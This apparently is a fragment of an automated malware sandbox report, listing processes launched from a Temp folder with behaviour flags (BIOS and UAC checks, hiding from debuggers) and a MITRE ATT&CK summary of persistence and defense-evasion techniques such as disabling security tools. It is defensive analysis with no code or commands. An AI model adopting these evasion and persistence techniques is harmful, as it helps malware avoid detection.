C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1092 -ip 10921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5956
-
C:\Users\Admin\AppData\Local\Temp\9B43.exeC:\Users\Admin\AppData\Local\Temp\9B43.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4756
-
C:\Users\Admin\AppData\Local\Temp\B1E9.exeC:\Users\Admin\AppData\Local\Temp\B1E9.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4464
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1